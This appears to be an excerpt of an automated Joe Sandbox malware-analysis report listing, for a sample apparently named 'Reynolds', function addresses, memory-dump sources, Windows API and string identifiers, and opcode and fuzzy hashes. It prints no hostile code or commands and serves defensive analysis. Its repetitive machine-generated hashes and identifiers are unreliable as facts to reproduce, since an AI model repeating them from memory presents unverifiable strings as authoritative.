                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintf
                                                                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                      • API String ID: 3988819677-2584243854
                                                                                                      • Opcode ID: 32885857382379a4b4f2003679ad0bf2db11e685a1a76c32f342b704b352f53d
                                                                                                      • Instruction ID: deeabcdfa1315909e3ea5ddca373386b43b2900c2dc6936161d39ceb93d30bcb
                                                                                                      • Opcode Fuzzy Hash: 32885857382379a4b4f2003679ad0bf2db11e685a1a76c32f342b704b352f53d
                                                                                                      • Instruction Fuzzy Hash: E4315E76B0AB47E5FB11EB61F4801ADA371BB44B84F8240B6DA0D5766ADF38E41BC310
                                                                                                      Function 000002453CA23983 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _errno
                                                                                                      • String ID: P$inity
                                                                                                      • API String ID: 2918714741-1221812512
                                                                                                      • Opcode ID: 8588b636597cac6a9eecc54f9e9a72e6ac2c16c1a3b101255fc09a57ffb9e336
                                                                                                      • Instruction ID: ed8511b8a74a0de736d4833599ead58dbd1c1263c59fc5b2b6ec6bc1d7947b63
                                                                                                      • Opcode Fuzzy Hash: 8588b636597cac6a9eecc54f9e9a72e6ac2c16c1a3b101255fc09a57ffb9e336
                                                                                                      • Instruction Fuzzy Hash: 76314023219AE487E7638F28E4553EABBA0FB85794F045151DFC943AAADB38C5C5CB00
                                                                                                      Function 00007FF7AA19BA9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CreateMessageObjectSendStock
                                                                                                      • String ID: $SysTabControl32
                                                                                                      • API String ID: 2080134422-3143400907
                                                                                                      • Opcode ID: 4eb597b33270e80a83c3599876bbbd812a4e3a60a25d597e742004689e749718
                                                                                                      • Instruction ID: 3cb0f8c7c716255a5064f4fedcc196e54a75fff58d17292e3f887c340c720ccf
                                                                                                      • Opcode Fuzzy Hash: 4eb597b33270e80a83c3599876bbbd812a4e3a60a25d597e742004689e749718
                                                                                                      • Instruction Fuzzy Hash: FA3188725097C1CAE7609F11E44479AB7A0F384BA4F504339EAA913AE8CB3CD442CF10
                                                                                                      Function 00007FF7AA12DAC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandleType
                                                                                                      • String ID: @
                                                                                                      • API String ID: 3000768030-2766056989
                                                                                                      • Opcode ID: 1a302059a24ef4730bf8bcb634e8bdb7dbb9c345eed5e02179e57bc52688c5e8
                                                                                                      • Instruction ID: 6f84703c2f0d1bef2b97a399187a0eaab53309c8f38ae49414eb2ddc4ad85f34
                                                                                                      • Opcode Fuzzy Hash: 1a302059a24ef4730bf8bcb634e8bdb7dbb9c345eed5e02179e57bc52688c5e8
                                                                                                      • Instruction Fuzzy Hash: AE21C422E09782D1FB619B24E5A0138A660EB46774FAA0776D66E037F4CE38D887D350
                                                                                                      Function 00007FF7AA19A938 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                      • String ID: static
                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                      • Opcode ID: e5c794eae5f48c2ef7f2f6a3d8fc67ccb9001089f9c2a959ce90b06ca3cf1746
                                                                                                      • Instruction ID: b6e1a5091d254d65be2ae85e662584ef8ddeab54723242a1360eb78aedca73ca
                                                                                                      • Opcode Fuzzy Hash: e5c794eae5f48c2ef7f2f6a3d8fc67ccb9001089f9c2a959ce90b06ca3cf1746
                                                                                                      • Instruction Fuzzy Hash: 6A315C32A09781CBE324DF25E440B5AB7B1F788790F554239EB9843BA8CB38E452CF10
                                                                                                      Function 00007FF7AA19A0DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                      • String ID: Combobox
                                                                                                      • API String ID: 1025951953-2096851135
                                                                                                      • Opcode ID: 419ce087720c7b5737b5b73e28fc957c16fa632f6a553db8683be6f9ef87a6ec
                                                                                                      • Instruction ID: b9efc4be35e4648c4068cfdd0af6d33aca6019f51a1c9c04c063d969755d9dc5
                                                                                                      • Opcode Fuzzy Hash: 419ce087720c7b5737b5b73e28fc957c16fa632f6a553db8683be6f9ef87a6ec
                                                                                                      • Instruction Fuzzy Hash: A9311A326097C1DAE7709F24F440B5AB7A1F7857A0F504235EAA843BA9CB3CD846CF10
                                                                                                      Function 00007FF7AA19A448 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                                      • String ID: edit
                                                                                                      • API String ID: 2978978980-2167791130
                                                                                                      • Opcode ID: 5492c754c9bff498288acdc113c590e82b98b645c49f858c44027990a109cd19
                                                                                                      • Instruction ID: a227f4aa98395d446f3ec2635f6b8c60a7e082ed572ffc175ebf7d2b2da56c75
                                                                                                      • Opcode Fuzzy Hash: 5492c754c9bff498288acdc113c590e82b98b645c49f858c44027990a109cd19
                                                                                                      • Instruction Fuzzy Hash: 3E314932A097C1CAE760DB15F44475AB7B1F7887A0F544235EAAC43BA8CB3CD846CB11
                                                                                                      Function 00007FF7AA12FC20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _handle_error
                                                                                                      • String ID: "$pow
                                                                                                      • API String ID: 1757819995-713443511
                                                                                                      • Opcode ID: 2a5c1d25bf9eaccf3d95b4360943358a5a34a98ae302652ad79e849c14545523
                                                                                                      • Instruction ID: bb34f39ccfcd12d48735ab265202fb29df1d803cc284044f193c391dc5e8f2ab
                                                                                                      • Opcode Fuzzy Hash: 2a5c1d25bf9eaccf3d95b4360943358a5a34a98ae302652ad79e849c14545523
                                                                                                      • Instruction Fuzzy Hash: 7D213A72D1DB88D6E361DF10F040A6AAAB0FBDA344F611325F68906968DBBDD0569F10
                                                                                                      Function 00007FF7AA1A0624 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 3712363035-3916222277
                                                                                                      • Opcode ID: cc2544113331effc305b0a03fe3b3a35c1ebbb01cab2a7be9a8f7d8f60356f9c
                                                                                                      • Instruction ID: a1bf9eba12b578158ae63eb5b5ebd678245248de8782de50a9c84705463f7d7e
                                                                                                      • Opcode Fuzzy Hash: cc2544113331effc305b0a03fe3b3a35c1ebbb01cab2a7be9a8f7d8f60356f9c
                                                                                                      • Instruction Fuzzy Hash: BE114C31A09641E6F721AF12F90026AF6B1FB94784F8A4179EA4D47A74CF3DD052CB10
                                                                                                      Function 00007FF7AA131444 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                      • String ID: !$tan
                                                                                                      • API String ID: 3384550415-2428968949
                                                                                                      • Opcode ID: 353651fcbdf869610a9aa7174845b6b37f2108fed80d9f7b1c03092e70d52472
                                                                                                      • Instruction ID: b218096e853c8b7888bf9889e8bb9e05eb3ffb6138cd331790fe83e466453446
                                                                                                      • Opcode Fuzzy Hash: 353651fcbdf869610a9aa7174845b6b37f2108fed80d9f7b1c03092e70d52472
                                                                                                      • Instruction Fuzzy Hash: 0101D632E19B8491EA55DF12F40037AA1A1BF9A7D4F904334E94D07B98EF3CD1518B10
                                                                                                      Function 00007FF7AA131378 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                      • String ID: !$cos
                                                                                                      • API String ID: 3384550415-1949035351
                                                                                                      • Opcode ID: a332118c418a9a5553ba94b25f2e8775fa0e5e0d6883273b594770b1dd192514
                                                                                                      • Instruction ID: 4a729fdee59f27c041cab60f3bb270518b79e25593be5303fa7a694faefd36a4
                                                                                                      • Opcode Fuzzy Hash: a332118c418a9a5553ba94b25f2e8775fa0e5e0d6883273b594770b1dd192514
                                                                                                      • Instruction Fuzzy Hash: AC012832E19B84D1EA55DF12E400376A171BF9A7D4F904334E94D06BD8EF3CD0524B00
                                                                                                      Function 00007FF7AA13138C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                      • String ID: !$sin
                                                                                                      • API String ID: 3384550415-1565623160
                                                                                                      • Opcode ID: baa30cb22590ecb22bb061425c7c6612d2a3b082cca11217b3942b55bf4d3348
                                                                                                      • Instruction ID: bb097ce1735571ebbd0597b992c3b3987c6c870c59636c3a3f185afcddb6b0c3
                                                                                                      • Opcode Fuzzy Hash: baa30cb22590ecb22bb061425c7c6612d2a3b082cca11217b3942b55bf4d3348
                                                                                                      • Instruction Fuzzy Hash: BD01D872E19B8991EA55DF12E40037AA171BF9A7D4F904334E95D06B98EF7CD1524B00
                                                                                                      Function 00007FF7AA131200 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _handle_error
                                                                                                      • String ID: "$exp
                                                                                                      • API String ID: 1757819995-2878093337
                                                                                                      • Opcode ID: ca465fa898a567bf7fb695c7da4f831c21791187771085b507e6f3573d05dac5
                                                                                                      • Instruction ID: 5a1b5ddfa4f80b79d120dc366b35b192ed038cd8fedeb5877df3fef51f591f0f
                                                                                                      • Opcode Fuzzy Hash: ca465fa898a567bf7fb695c7da4f831c21791187771085b507e6f3573d05dac5
                                                                                                      • Instruction Fuzzy Hash: BD01A536D29B88D2F621DF24E0492AABA71FFEA704F605315E7441A674CB7DD4829B10
                                                                                                      Function 000002453CA21800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: fprintf
                                                                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                      • API String ID: 383729395-3474627141
                                                                                                      • Opcode ID: 02ecdfc01483df5ad920e5d3ab05c7be711505ea062df89013f80c4b4e6c90cd
                                                                                                      • Instruction ID: 93803c870f5d702464c24fbb431809e0f429c8f3b561eefbb82ae16e5a8f2826
                                                                                                      • Opcode Fuzzy Hash: 02ecdfc01483df5ad920e5d3ab05c7be711505ea062df89013f80c4b4e6c90cd
                                                                                                      • Instruction Fuzzy Hash: E9F0F613604EA483E222AF64A9492ED6770E7593C1F409255DFCE63653DF19D4C2C300
                                                                                                      Function 00007FF7AA117450 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7AA117479
                                                                                                      • TlsSetValue.KERNEL32(?,?,?,00007FF7AA1170D1,?,?,?,?,00007FF7AA11649C,?,?,?,?,00007FF7AA114B1B), ref: 00007FF7AA117490
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Valuetry_get_function
                                                                                                      • String ID: FlsSetValue
                                                                                                      • API String ID: 738293619-3750699315
                                                                                                      • Opcode ID: f78dc03a8b7e459b2f5a523a33989f4a04428b56cdb294ea6966631ac146a953
                                                                                                      • Instruction ID: 6242ab320b6d995683fca86746e5527b6c3e66b256034ea5605e8c71405956bd
                                                                                                      • Opcode Fuzzy Hash: f78dc03a8b7e459b2f5a523a33989f4a04428b56cdb294ea6966631ac146a953
                                                                                                      • Instruction Fuzzy Hash: CFE0E5B1A0A642F1FA167B40F4000F9E2B1AF48790FDA40B5D51D063B2EE3CD496C730
                                                                                                      Function 000002453CA25E67 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strerrorstrlen
                                                                                                      • String ID: (null)
                                                                                                      • API String ID: 960536887-3941151225
                                                                                                      • Opcode ID: 7172875ce593b75b5341076a1c63307b3f224e7aacb88239cda03de814cec602
                                                                                                      • Instruction ID: 74ddcf753ca26a8a200a9b884ed4d1b5e7d8b817dbc39c000657ae254ae32e4d
                                                                                                      • Opcode Fuzzy Hash: 7172875ce593b75b5341076a1c63307b3f224e7aacb88239cda03de814cec602
                                                                                                      • Instruction Fuzzy Hash: 7AE0BF27306E7087F946AFA1941D3EE6D916F847C0F6840A56DCB0668BEE29D4C05691
                                                                                                      Function 000002453CA283F7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strerrorstrlen
                                                                                                      • String ID: (null)
                                                                                                      • API String ID: 960536887-3941151225
                                                                                                      • Opcode ID: 8f9d73ed0f7f808f8cf2d3c42a058803114a596263f7b0412af6d2630ff1c4ef
                                                                                                      • Instruction ID: cb7d8ad1b8cf07797dcf5fceaea51ed2406881317f46a351e21c44ef2f7e80f5
                                                                                                      • Opcode Fuzzy Hash: 8f9d73ed0f7f808f8cf2d3c42a058803114a596263f7b0412af6d2630ff1c4ef
